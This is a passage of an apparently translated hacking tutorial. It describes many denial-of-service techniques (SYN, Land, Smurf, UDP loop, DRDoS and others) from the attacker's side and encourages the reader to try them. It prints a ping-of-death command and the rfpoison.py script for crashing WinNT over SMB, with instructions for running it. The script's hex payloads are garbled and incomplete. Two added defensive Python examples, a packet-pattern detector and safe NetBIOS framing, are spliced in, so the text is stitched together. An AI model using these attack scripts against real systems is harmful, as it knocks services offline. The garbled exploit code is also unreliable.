b . ) Ping of Death :
_ In this kind of DoS attack you only need to send one data packet of very large size through the ping command to the target host and their system hangs.
_ Example : ping l 000
c . ) Teardrop :
_ As we know, all data sent across a network from a source system to a destination system goes through two steps: the data is split into small fragments at the source, and each fragment carries an offset value that identifies its position within the data being transferred. When the fragments reach the destination, the destination uses the offset values to reassemble the fragments in their original order. Exploiting this weakness, one only needs to send the destination a series of packets whose offset values overlap one another. The destination cannot reassemble these packets; it loses control and can crash, reboot or stop working if the number of packets with overlapping offsets is large enough!
d . ) SYN Attack :
_ In a SYN attack the hacker sends the target system a series of SYN packets with non-existent source IP addresses. On receiving these SYN packets the target replies to the non-existent addresses and waits for a response from the spoofed IPs. Because these IPs do not exist, the target keeps waiting and keeps these pending "requests" in memory, wasting a significant amount of memory on the server that should be used for other work instead of waiting for replies that never come. If many packets with spoofed IPs are sent at the same time, the system is overloaded and crashes or reboots. == > then just sit back.
e . ) Land Attack :
_ A Land attack is much like a SYN attack, but instead of non-existent IP addresses the hacker uses the victim system's own IP address. This creates an endless loop inside the victim's own system: one side needs to receive a reply while the other side can never send one. == > It chokes on its own traffic.
f . ) Smurf Attack :
_ A Smurf attack needs three parties: the hacker (who gives the attack command), the amplifier network (which obeys the hacker's command) and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets have the victim's IP as their source IP. When the packets reach the broadcast address of the amplifier network, the machines in that network believe the victim's machine sent the ICMP packets and all reply at once to the victim's system with ICMP reply packets. The victim's system cannot withstand the enormous volume of these packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the amplifier network multiplies the volume of ICMP packets many times over. The amplification factor depends on the number of machines in the amplifier network. The hacker's task is to take over as many networks or routers as possible that forward packets directly to the broadcast address without filtering the source address at the packet's egress points. With these systems in hand the hacker can easily carry out Smurf attacks on the systems to be attacked. == > one machine is no great worry, but dozens of machines ganging up will flatten the target.
g . ) UDP Flooding :
_ UDP flooding requires two systems to take part. The hacker makes the system enter a loop exchanging data over the UDP protocol: the packets' source IP is spoofed as the loopback address (127.0.0.1), and these packets are sent to the victim's system on the UDP echo port (7). The victim's system replies to messages that came from 127.0.0.1 (that is, from itself), and the result is an endless loop. However, many systems disallow the loopback address, so the hacker instead spoofs the IP of some machine on the victim's network and floods the victim's system with UDP. If you do not succeed with this method, it is your own machine that goes down.
h . ) DNS attack :
_ The hacker can plant a false entry in the victim system's Domain Name Server so that it points to some website of the hacker's. When a client asks the DNS to resolve the compromised address into an IP, the DNS (whose temporary cache the hacker has altered) immediately resolves it to the IP the hacker pointed it at. The result is that instead of the website they wanted to visit, the victims land on a website the hacker created. A really effective denial of service!
g . ) Distributed DoS Attacks ( DDoS ) :
_ DDoS needs at least a few hackers to take part. First the hackers break into poorly secured computer networks and install DDoS server programs on those systems. Then the hackers agree on a time, use DDoS clients to connect to the DDoS servers, and simultaneously command those DDoS servers to launch a DDoS attack on the victim's system.
h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :
_ This is perhaps the most damaging kind of attack, and the one that brings down the opponent's machine fastest. The method is roughly the same as DDoS, but instead of attacking with many machines the attacker needs only one machine and attacks through the big servers of the world. Still using the method of spoofing the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo and so on; these servers reply to the victim's address. Receiving so many packets through these big servers at once quickly saturates the victim's link and crashes or reboots the machine. This attack is dangerous in that a single machine with an ordinary Internet connection can knock out any system with the best link in the world if we do not stop it in time. Our HVA website was also DoSed recently by this very kind of attack.
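The patterns above each leave a recognisable trace on the wire, and the defender's first question is how to spot them. The following Python script is an added example, not part of the original text, that runs simple checks over a handful of constructed packet summaries (one dict per packet, not a real capture): a source equal to the destination (Land), an ICMP echo request addressed to one of our own broadcast addresses (Smurf), UDP aimed at the echo port from a loopback or self address (the UDP flooding loop), and a count of sources whose SYN is never followed by an ACK on the same service (SYN flood). The addresses, the record format and the threshold of five half-open sources are assumptions for the demo; a real deployment would feed it flow records or a capture.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed packet summaries for the demo; not a real capture. Each record
# is one packet seen at the edge of the defended network, which owns
# 192.0.2.0/24 and 198.51.100.0/24 (the latter is a directed-broadcast target).
SAMPLE_PACKETS = [
    # Benign client: SYN, then the ACK that completes the handshake
    {"src": "203.0.113.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 443, "flags": "S"},
    {"src": "203.0.113.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 443, "flags": "A"},
    # Six sources send SYN to port 80; only the first ever sends an ACK
    {"src": "10.0.0.1", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    {"src": "10.0.0.1", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "A"},
    {"src": "10.0.0.2", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    {"src": "10.0.0.3", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    {"src": "10.0.0.4", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    {"src": "10.0.0.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    {"src": "10.0.0.6", "dst": "192.0.2.10", "proto": "tcp", "dport": 80, "flags": "S"},
    # Land: source address equals destination address
    {"src": "192.0.2.10", "dst": "192.0.2.10", "proto": "tcp", "dport": 139, "flags": "S"},
    # Smurf: ICMP echo request to our broadcast address, source spoofed as the victim
    {"src": "192.0.2.10", "dst": "198.51.100.255", "proto": "icmp", "icmp_type": 8},
    # UDP echo loop bait: loopback source aimed at the echo service
    {"src": "127.0.0.1", "dst": "192.0.2.10", "proto": "udp", "dport": 7},
]

LOCAL_NETS = [ip_network("198.51.100.0/24")]  # assumed local prefixes
ICMP_ECHO_REQUEST = 8
UDP_ECHO_PORT = 7


def analyze(packets, local_nets=LOCAL_NETS, syn_threshold=5):
    """Return a list of (kind, detail) alerts for the DoS patterns above."""
    alerts = []
    broadcasts = {net.broadcast_address for net in local_nets}
    syn_sources = defaultdict(set)  # (dst, dport) -> sources that sent a SYN
    ack_sources = defaultdict(set)  # (dst, dport) -> sources that sent an ACK
    for p in packets:
        src, dst, proto = ip_address(p["src"]), ip_address(p["dst"]), p["proto"]
        if src == dst:
            alerts.append(("land", f"{src} -> {dst} {proto}"))
        if proto == "icmp" and p.get("icmp_type") == ICMP_ECHO_REQUEST and dst in broadcasts:
            alerts.append(("smurf", f"echo request to broadcast {dst} claiming source {src}"))
        if proto == "udp" and p.get("dport") == UDP_ECHO_PORT and (src.is_loopback or src == dst):
            alerts.append(("udp_echo_loop", f"{src} -> {dst}:{UDP_ECHO_PORT}"))
        if proto == "tcp":
            key = (dst, p["dport"])
            if p["flags"] == "S":
                syn_sources[key].add(src)
            elif "A" in p["flags"]:
                ack_sources[key].add(src)
    # SYN flood: many sources whose handshake never completes on one service
    for key, srcs in syn_sources.items():
        half_open = srcs - ack_sources[key]
        if len(half_open) >= syn_threshold:
            alerts.append(("syn_flood", f"{len(half_open)} half-open sources to {key[0]}:{key[1]}"))
    return alerts


def alert_counts(packets=SAMPLE_PACKETS, syn_threshold=5):
    """Number of alerts per kind, convenient for checking the result."""
    counts = {}
    for kind, _ in analyze(packets, syn_threshold=syn_threshold):
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_PACKETS):
        print(f"{kind:14} {detail}")
```

Each check maps to a mitigation the text implies: Land and the spoofed Smurf source are caught by rejecting packets whose source is an address the network itself owns, Smurf amplification stops when routers drop directed broadcasts, and the half-open count is the signal that justifies SYN cookies or a shorter backlog timeout on the service it names.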
0 . ) Web DoS technique with Python :
_ This technique can only be used against WinNT, and you need time before the victim's machine goes down.
_ Download Python at http://www.python.org/ to use it.
_ Save the following code to a file named rfpoison.py.
CODE
# rfpoison.py, written for the Python 1.5/2.x of its day (string module,
# print statement); it does not run unchanged on Python 3.
import string
import struct
from socket import *
import sys

def a2b(s):
    # hex dump text ("ff 53 4d ...") -> byte string
    bytes = map(lambda x: string.atoi(x, 16), string.split(s))
    data = string.join(map(chr, bytes), '')
    return data

def b2a(s):
    # byte string -> hex dump text, for the debugging prints below
    bytes = map(lambda x: '%.2x' % x, map(ord, s))
    return string.join(bytes, ' ')

# NOTE: the hex dumps below are reproduced incompletely on this page (characters
# are missing from many of the bytes), so a2b() cannot rebuild the original
# messages from them.

# NBSS session request
nbss_session = a2b("""
1 00 00 20 3 b
e 3 3 3 3
1 3 1 3 1 3 1 3 1 3 1 00 20
2 c 1
3 3 1 3 1 3 1 3 1 3 1 1 1 00 00 00
00 00
""")

# SMB messages
crud = (
# SMBnegprot request
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 00 01 00 00 1 00 02 0 3
20 e f 2 b 20 0 2 f 2 1 d
20 31 2e 30 00 02 d 3 2 f 3 f 20
e f 2 b 3 20 31 2e 30 33 00 02 d
3 2 f 3 f 20 e f 2 b
3 20 33 2e 30 00 02 c 1 e d 1 e 31 2e 30
00 02 c d 31 2e 32 30 30 32 00 02 3 1 d
2 1 00 02 e 20 c 1 e d 1 e 20 31 2e
30 00 02 e 20 c d 20 30 2e 31 32 00
""",
# SMB session setup request
"""
ff 3 d 2 3 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 1 00 00 00 f 2 b 2 f
0 00 e 00 3 1 d 2 1 00
""",
# SMBtcon request
"""
ff 3 d 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 0 01 00 0 ff 00 00 00 00
00 01 00 1 00 00 c c 2a 3 d 2 3 2
2 c 0 3 2 00 0 3 00
""",
# SMBnt create request
"""
ff 3 d 2 a2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 1 ff 00 00 00 00
0 00 0 00 00 00 00 00 00 00 f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 0 00 c 3 2
3 3 00
""",
# SMBtrans request (bind)
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 10 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 c
00 00 c 00 02 00 2 00 00 0 1 00 c 0
0 c 00 00 00 0 00 0b 00 10 00 00 00 00
00 00 01 00 00 00 30 1 30 1 00 00 00 00 01 00
00 00 00 00 01 00 c f 32 b 0 1 d3 01 12
a bf e e1 03 00 00 00 0 d a eb 1c
c 11 f e 0 00 2b 10 0 02 00 00 00
""",
# SMBtrans request
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 10 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 c
00 00 c 00 02 00 2 00 00 0 1 00 c 0
0 c 00 00 00 0 00 00 03 10 00 00 00 00
00 00 02 00 00 00 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 c 00
c 00 2a 00 3 00 d 00 2 00 3 00 00 2 00
00 00 2 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)

def smb_send(sock, data, type=0, flags=0):
    # 4-byte NetBIOS session header: type, flags, 16-bit big-endian length
    d = struct.pack('!BBH', type, flags, len(data))
    #print 'send:', b2a(d+data)
    sock.send(d+data)

def smb_recv(sock):
    # read the 4-byte header, then exactly the number of payload bytes it announces
    s = sock.recv(4)
    assert(len(s) == 4)
    type, flags, length = struct.unpack('!BBH', s)
    data = sock.recv(length)
    assert(len(data) == length)
    #print 'recv:', b2a(s+data)
    return type, flags, data

def nbss_send(sock, data):
    sock.send(data)

def nbss_recv(sock):
    # the session response is a bare 4-byte header
    s = sock.recv(4)
    assert(len(s) == 4)
    return s

def main(host, port=139):
    # NetBIOS session service
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    nbss_send(s, nbss_session)
    nbss_recv(s)
    for msg in crud[:-1]:
        smb_send(s, msg)
        smb_recv(s)
    smb_send(s, crud[-1])   # no response to this
    s.close()

if __name__ == '__main__':
    print 'Sending poison...',
    main(sys.argv[1])
    print 'done.'
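The script's smb_send() and smb_recv() show the NetBIOS session framing that every SMB message rides in, and its bare assert on recv() is exactly the spot where a real implementation has to be careful: TCP gives no guarantee that recv(4) returns four bytes, or that a peer sends a payload as long as its header claims. As an added example, not part of rfpoison.py, the following Python code packs and parses that 4-byte header (type, flags, 16-bit length, as the script treats it) defensively: oversized payloads are refused, a buffer ending in a partial frame returns the remainder instead of failing, and read_frame() loops until it has the whole frame or the peer closes. The constants and the one-byte test double are assumptions for the demo.

```python
import struct

# NetBIOS session service header as the script above packs it: one type byte,
# one flags byte and a 16-bit big-endian length, followed by the payload.
# Assumption for this demo: the length is treated as 16 bits, as in the script;
# the real header (RFC 1002) also uses the low flag bit as a 17th length bit.
NBSS_HEADER = struct.Struct("!BBH")
NBSS_SESSION_MESSAGE = 0x00  # type used for SMB payloads
NBSS_KEEPALIVE = 0x85        # zero-length frame


def encode_frame(payload, msg_type=NBSS_SESSION_MESSAGE, flags=0):
    """Frame a payload, refusing anything the 16-bit length cannot describe."""
    if len(payload) > 0xFFFF:
        raise ValueError("payload too long for a 16-bit length field")
    return NBSS_HEADER.pack(msg_type, flags, len(payload)) + payload


def decode_frames(buf):
    """Split a byte buffer into complete frames.
    Returns (frames, remainder): each frame is (type, flags, payload) and the
    remainder is any trailing partial frame, kept for the next read instead
    of being trusted the way the script's bare assert on recv() does."""
    frames = []
    pos = 0
    while len(buf) - pos >= NBSS_HEADER.size:
        msg_type, flags, length = NBSS_HEADER.unpack_from(buf, pos)
        end = pos + NBSS_HEADER.size + length
        if end > len(buf):
            break  # header announces more bytes than we have: wait for them
        frames.append((msg_type, flags, bytes(buf[pos + NBSS_HEADER.size:end])))
        pos = end
    return frames, bytes(buf[pos:])


def read_exact(recv, n):
    """Collect exactly n bytes from recv(size), which may return short reads."""
    chunks, remaining = [], n
    while remaining:
        chunk = recv(remaining)
        if not chunk:
            raise ConnectionError("peer closed the connection mid-frame")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def read_frame(recv):
    """Read one frame from a recv-like callable, for example sock.recv."""
    msg_type, flags, length = NBSS_HEADER.unpack(read_exact(recv, NBSS_HEADER.size))
    return msg_type, flags, read_exact(recv, length)


def one_byte_reader(data):
    """Test double for sock.recv that hands back one byte per call,
    the worst-case short read."""
    buf = bytearray(data)

    def recv(n):
        return bytes([buf.pop(0)]) if buf else b""
    return recv
```

read_frame() is the drop-in shape a server or client should use in place of a single recv(): it still raises on a peer that disconnects mid-frame, but never silently misparses the next header because the previous read came up short.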
To bring down the opponent's server you need time for the DoS; if you cannot afford to wait, it is best not to use this method. But "poking at it just to see" is fun, isn't it?
(Continued)